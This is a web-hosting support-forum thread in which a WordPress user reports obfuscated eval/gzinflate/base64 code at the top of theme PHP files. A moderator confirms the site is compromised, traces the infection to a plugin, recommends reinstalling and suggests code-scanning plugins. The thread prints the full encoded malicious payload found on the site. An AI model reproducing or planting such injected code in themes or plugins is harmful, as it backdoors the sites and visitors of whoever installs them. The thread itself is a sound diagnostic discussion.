Jump to content
Sign in to follow this  
smicky

Platform Pro Eval Code

Recommended Posts

smicky

I noticed that there were several (like 30 or so) lines of code at the begining of several of the php files in the PlatformPro theme (for example: header, footer, main index template). They all started with <?php /*-random line of code-*/ eval(gfinflate(base64_decode(' 30-40 lines of code- ');?> Now in the past, this has been a sure sign of your theme being hacked. However, those were free themes and not as fancty as platformpro. So I just wanted to make sure that this is here for a reason and not a sign that there is hacked code in my theme....If it isn't suppose to be there and it is hacked, what do you recommend? B

Share this post


Link to post
Share on other sites
smicky

Here is an example from the main index page:

<?php /*a357267efa9c9b9dda2f259714d9c2ba*/ eval(gzinflate(base64_decode('DZVFrsUIggSP01Xywkw a9cLM/IyblpmZffr5R8iQIrK80uGf+munakiP8p8s3UsC+19R 5nNR/vMfPklE/rwlgQntHgSHJhn9IRmTZHvVz/h2CCksSGOBI EByrwKmcjkfUrVoQDXGEBJrEAhE84zECQUxi/1FesCt72Y0gG 3maBI5o7MJDr7tz3g6y4hmgrwL+8N3ecixh3 ikuVFH+w1KwUAp5b0jWxAjs5hymna8DMSvjMB/P3pNAAjet3V kDkaytjPP6pxRnzZs/MNd4Ve1J91mhiopL2vEB2heJpXmOvtQh 8FZVtwVV8KvH1ph 6gEi0AbXfDtIETjKIigcIBJ5y364u4BnxlruasgwjZkrMGsq7 Gk8sorrYo4J2hVvC6Mamk4OLA+RvQZj6qprpFHnZZs3FSz33X 5JfHp4/cfEiCX/Y80lYbzdnNScuqCBRjhq+5yLbHxh6wQZvCG iTbYDYfvIHWBB NAcW+hT+VAsuZDHNwhYqcSBnrm8cTckDf15dmZhDi1PNjhzIX t2Rz1iiqk1LTN7T1ZxyAMU3lAPeLdLRNZZWUss+gxvhXTQBAc i0X5raHrJYYRQDSj9aws5WFEcS6VSfQqXYcqz7vbLuK /IBOTgd8SY6h1AjjuZzuU2xvTLKEK0VHsCc62BV6a7uxo7JBry 5lbdPIxN0qvwz3J2uG7F7qzwkQMb8Sayb0qYzmY+XNxri2tlPe 33L6pSQsw9NW7kddaYyw+cVm4xaqSl4RVOf06y4T/nrBQ5IP3U iGLMwiEx2OIUWxePdEn8+9zboF1VT+jJZh7fOIr 0YB5/E/Jr5WZKaaWtpl0m7ksjvAWfjR6r8B5POt8urpNO7pBg gq5KjCtSThsjRoXmMKvGoSUp0yIk0G6/rhtxVtEyv58AMa+7kg VAa7nsUJ9eLhR/0jYkcTwB3xxUPDypSY8l3dbe6uR5czkhCurK 3EpNqeljEhOFK kqgUxOIC7tphG6QtQXBM27YyrwRgXQ1dkN4xMVmD9pAhiM7NOy zvx28IbVVg/6Vt+uaKR8a2W+tB0FSYVsR7Gry/91F2B1rI00kP PeZMwKdJGaBabbkhukvgM+Hrw/7zMQ/DLuoNGDZ/fbqYebTO0z 7L1CLqi3LNfCdY0PXhKxaT+7GKNyPbuCWyLmpQK wSRpjlbvD1e5KKCpiMysD2wT+qhWvvnVEAZ7MJQRU6sQj2nnlF a8cBIm1PD0Eqt98Veie8nDnKv1ZplWQ1Aer7gRorWErmZfjtuX UhN0aeUCyujZSziVM1DhmCRjchc8MP9Ujwlzp8UAr15iWFfrp KyTHRvQOidG4dZdsJo1zlyTTOZazjIm0VSyLvspy/t1WciG8BK BvO22O2ET6QSiIa0+VxowTfgOd+NuFR/NDXA1Lb4rlAtR8pcSy4 WQNvtucJBZ6YC7Dh5E48jZqd1La6oQ rN3vx2GVAKdZ45us7t5ArlUhRrGtdGqfPPddfs0CTdVRcDoyy3 nbo/rly+eSEOuEd/CfboDt5rANjgPRz1j8hBwhI+IqEQIrPR8B iYpWKt/wgSnvX3zOCUnDcqVZwTtspMhswa0D5WbEFp70tkqcFD xNzE8 IdQ6KmGitvBx3cFoYdAlY200F4XxYx/DN0pV5cltLI/qyp4Oz5 dUfpf7VyU/f5SxzH58iOVpr+pmMydsMugoXQi9XXPnXLPJuFnP ug5VSUuA+TySdrL7fdT1Q95cqf9w4WE/auCAKCiflrRmuHhOa4 IjFdVqR+UDYyvw4OFxA6fzZ8TK/jleCNhjUPDMg/8CdF+UiDna jN3q2D3LaysUyHfvwyRWNzIDOk8X61GK2jiSho/dsKEfdjmv7+ c8ldFt3fOdiQLHvo56ZcXa3iaGNNFCQhtdTLAe lUk4zk1h0ZYixxWADr3PH9fG5Raqsh1HgToCr43rMb2GNpT4gs 6YL2lyjHIDioC2NCsTwNU2UD9WhW3Htwh25yL/niE+tKEWq5B3 tmwyhOmEfbIU7YTJfecDnb61TZMuWx/g3KqrZkSxJK2sjdEdS1 lv2qjOTMa57W025mP77FaYgFUMzkC5 WeDm4uMKLWcT8UOxtIzr567EyiHngPOgIkjfRnL2wA4dNb2Bh2 ysxhfnfJ9jjucVlzuOtQbwyl0YWum+cpVaedldqMdQh2mYilSk R2h3pya3Gs8+/q6Oj05oU7lO2FyK2OQPLlEr602D2u7mLxXLz3 XP6/69wPfMaS3fg/l3RVSiZASkKrbUR2M68RmKswhR+IC9wkVd tZ5yJIdN+Od9J9YvyJSKzu2L1e3szW9h35j0ot/J/op6nWMy+8 wdgRoL5Qg92D14j+1GY6dSSQSg/5zs+msSwfPsZbMWHhsz33oU +ZPbTzE1o0bklkX0tpLwEJ2hxd Y30efm+NsABnjXalYYsuJzxXitlqOYkgRXbmpz0mik27fax0L Khco7pnVc0SRwp6fp4xUYIkBlB2pt1QOzBaaHOU5BlwE+9WVeu6J /P4S+PoTf3bElLJOJvqHVknBbAuGp5PcPmEmLGh80f3pLkdBcS P5L6DrC7MB/UFS3RE/jSCTD44KNOijkC9mzPnk/fTTBybC9phj h54VzcSn4q8f6Q2WgVV+kmD+M1gB7ZmWOIwHNk rClKWN3t+yW+Ry/JuxnqalhD7VfM24Mep1AOFR30aZXMrN3ch+ zgmdAPGOxZUJY3 5Y5LFuD+m2kro3DdbpRRcXTkF3fHU/3K85XAnXjMdceSJV6M7O BTZBdg1q/Mm51UovsBlK3H5YFTx26lm1GTLuUxqjrPXsm9zf3H uZPv9P6E OpXe2GJH1Yzk8U2jR4xgvSryGvHazq0RvYR1xW360nOCRh1RvJ 8Csbf3stEFeG5ZZyB1gb4/aqKuh3fPWVoZOOzz2arkjeURdLM6 PsfprTBX6jeBbwKN9R5u O58FXL4+XIeUNDQ194Rvs+nu /zoxFeQI6Ffmwf33u58pWyNiva4SThxiMnI4FfIhW59KXWifv oBWM9KWetOJk5mO1NE9yQjqniLHhT35SugdcCDS6RiIFK3weK cqcxDXTP4gYqUksk5MrpoqEukU9kN4Cb2zA8+mIjvxCXeKO1+ G8ON65eTYoZTlD6MNR/MwepCQRB0qf/+599///2//wc=')));?> <?php /* This theme is Copyright © 2008-2010 Andrew Powers, PageLines.com (andrew AT pagelines DOT com) Licensed under the terms of GPL. */
this is from my site at orangebeardmedia.com

Share this post


Link to post
Share on other sites
Simon

Where did you download the theme? It is definately compromised!

Share this post


Link to post
Share on other sites
Simon

Looks like your version of tubepress is causing it. Here is a snippet from the decoded text: `if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/kunden/homepages/12/d100333497/htdocs/orangebeardmedia/wp-content/plugins/tubepress/sys/classes/org/tubepress/api/const/options/names/5b0.php';`

Share this post


Link to post
Share on other sites
Simon

Can you send me a zip of your theme folder? and the tubepress folder too if possible?

Share this post


Link to post
Share on other sites
smicky

Sure, (sorry I was MIA for a few Days) I will do that today. I was noticing that when I had the TubePress plugin turned on it was screwing multiple things up. What do you suggest for fixing it? BTW, I downloaded the theme from the purchase screen on this site.

Share this post


Link to post
Share on other sites
smicky
Ok, 6 months later and not only do i have this problem on my site but also on my three other wordpress installations that I host. So... 1. What do you recommend to get rid of it? Is there any way to do it without having to reinstall all four sites? 2. How do I keep from getting this in the first place? I download the themes form the platform site so I know they are secure...

Share this post


Link to post
Share on other sites
Simon
1. I recommend starting from scratch for all blogs affected. 2. You MUST have used a bad plugin.

Share this post


Link to post
Share on other sites
smicky
So how do I avoid using a bad plugin in the future...all the plugins I use are installed from within the wordpress dashboard so you would assume that they have been checked by Wordpress...

Share this post


Link to post
Share on other sites
Simon
no, there are thousands of plugins on wp.org, none of them are checked.

Share this post


Link to post
Share on other sites
smicky
Does PageLines give a list of approved plugins outside of the ones suggested for PlatformPro? Specifically a video plugin?

Share this post


Link to post
Share on other sites
Simon
@smicky They approved in that they work as intended within the theme, we do not do security audits on any plugins. All I can suggest, is installing Theme-Check and its sister Plugin-Check. Both plugins written by me ;) but anyway they scan for bad code in the plugins and themes, you will need both installed.

Share this post


Link to post
Share on other sites
smicky
Will do thanks....and very suttle on the self promotion.. ;)

Share this post


Link to post
Share on other sites
smicky
One more question.... I am using both the theme checker and the plugin checker and they are working well! One of the plugins that I use and that is recommended by Platform is Disqus...however I go the following warnings when I ran the plugin check: WARNING: Found ini_set in the file disqus-comment-system/lib/api/disqus/url.php. Themes should not change server PHP settings. Line 205: ini_set('user_agent', USER_AGENT); WARNING: Found ini_set in the file disqus-comment-system/export.php. Themes should not change server PHP settings. Line 6: @ini_set('memory_limit', '256M'); WARNING: Found eval in the file disqus-comment-system/lib/api/disqus/json.php. eval() is not allowed.. Line 258: return eval('return ''.str_replace(''',''',$buf).'';'); WARNING: Found base64_encode in the file disqus-comment-system/disqus.php. base64_encode() is not allowed. Line 1278: $user_data = base64_encode(cf_json_encode($user_data)); WARNING: fwrite was found in the file disqus-comment-system/lib/api/disqus/url.php possible file operations. Line 146: fwrite($fp, $req); WARNING: fsockopen was found in the file disqus-comment-system/lib/api/disqus/url.php possible file operations. Line 100: function _dsq_fsockopen_urlopen($url, $postdata, &$response, $file_name, $file_field) { Line 132: $fp = @fsockopen($url_pieces['host'], $url_pieces['port'], $errno, $errstr, SOCKET Line 232: * Attempts to use cURL, fopen(), or fsockopen(), whichever is available Line 260: // Try curl, fsockopen, fopen + stream (PHP5 only), exec wget Line 277: // TODO: Find the failure condition for fsockopen() (sockets?) Line 278: _dsq_fsockopen_urlopen($url, $postdata, $response, $file_name, $file_field); Line 292: return 'fsockopen'; WARNING: fopen was found in the file disqus-comment-system/lib/api/disqus/url.php possible file operations. Line 180: function _dsq_fopen_urlopen($url, $postdata, &$response, $file_name, $file_field) { Line 207: $fp = fopen($url, 'rb', false, $ctx); Line 232: * Attempts to use cURL, fopen(), or fsockopen(), whichever is available Line 260: // Try curl, fsockopen, fopen + stream (PHP5 only), exec wget Line 274: } else if(ini_get('allow_url_fopen') && function_exists('stream_get_contents')) { Line 275: _dsq_fopen_urlopen($url, $postdata, $response, $file_name, $file_field); Line 289: } else if(ini_get('allow_url_fopen') && function_exists('stream_get_contents')) { Line 290: return 'fopen'; WARNING: file_get_contents was found in the file disqus-comment-system/lib/api/disqus/url.php possible file operations. Line 32: $content[] = file_get_contents($file_name); WARNING: curl_init was found in the file disqus-comment-system/lib/api/disqus/url.php possible file operations. Line 56: $c = curl_init($url); Line 261: if(function_exists('curl_init')) { Line 287: if(function_exists('curl_init')) { WARNING: curl_exec was found in the file disqus-comment-system/lib/api/disqus/url.php possible file operations. Line 77: $data = curl_exec($c); When I get warnings like this, I am inclined not to install the plugin...your thoughts?

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

Sign in to follow this  

×